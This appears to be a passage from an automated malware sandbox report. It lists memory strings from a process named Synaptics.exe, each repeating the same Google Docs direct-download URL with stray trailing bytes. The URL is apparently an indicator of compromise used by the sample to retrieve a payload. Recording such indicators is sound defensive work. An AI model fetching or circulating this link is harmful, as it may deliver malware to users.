                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?yZ
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-WoW
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCn7
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadESF
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLt0
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLtd1
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNE
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNx)
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPolic
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPwV7k6
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecurity
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTE
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTu
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTu:
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTx?
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUS1
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX%
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXl
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYx$
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_XT
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmob
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadag
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadan
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadartse
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclos
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.ne(
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.nen
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.a
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcr
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct.net.cn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd-typ
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#f
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddbox-~e
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddica
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddir=l
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddnX
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddoApuh
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.&
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecnapps.cn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadedp%
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderco
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderflo
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.$
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgth:
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgvt2V
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-ua
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.go
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadinfo.
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir=l
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiveUn
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifor
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasU
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasu
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasua
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn%e
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
